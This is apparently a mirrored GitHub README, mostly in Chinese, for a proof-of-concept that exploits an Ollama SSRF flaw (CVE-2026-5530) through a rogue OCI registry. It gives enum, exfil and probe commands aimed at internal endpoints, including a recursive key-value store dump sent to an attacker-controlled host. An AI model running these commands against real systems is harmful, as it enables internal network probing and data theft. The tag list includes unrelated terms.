davidrxchester/CVE-2026-5530
GitHub: davidrxchester/CVE-2026-5530
这是一个针对 CVE-2026-5530 的概念验证工具,利用 Ollama API 的 SSRF 漏洞通过 OCI 注册表重定向实现内网探测与数据外泄。
Stars: 0 | Forks: 0
# CVE-2026-5530
Ollama SSRF 通过 OCI registry 重定向实现完整响应外泄。
Writeup: https://davidrochester.com/posts/cve-2026-5530
## 披露
多次联系 Ollama 均未收到回复。
## 用法
三种模式:enum、exfil 和 probe。
### Enum
从 Ollama 主机发现可访问的活跃内网端点。
```
python3 poc.py targets.txt --registry-host
```
### Exfil
当已知响应大小时,外泄 SSRF 响应。
```
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host
```
### Probe
自动二分查找响应大小,然后进行外泄。
```
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host
```
## 选项
```
target URL or file of URLs (one per line, # for comments)
-p, --port rogue registry port (default: 9999)
--exfil-port exfil registry port (default: 10000)
--exfil exfil mode, requires --size
--probe binary search for size, then exfil
--size Content-Length (required with --exfil)
--registry-host your attacker IP/hostname that Ollama can reach
--ollama Ollama API URL (default: http://127.0.0.1:11434)
```
标签:API 安全, CISA项目, CVE-2026-5530, GitHub, IP 地址批量处理, LLM评估, Maven, OCI registry, Ollama, POC, Python, SSRF, 二分查找, 代码生成, 信息泄露, 内网探测, 响应窃取, 实时处理, 容器镜像仓库, 插件系统, 无后门, 服务器端请求伪造, 渗透测试工具, 漏洞验证, 逆向工具, 重定向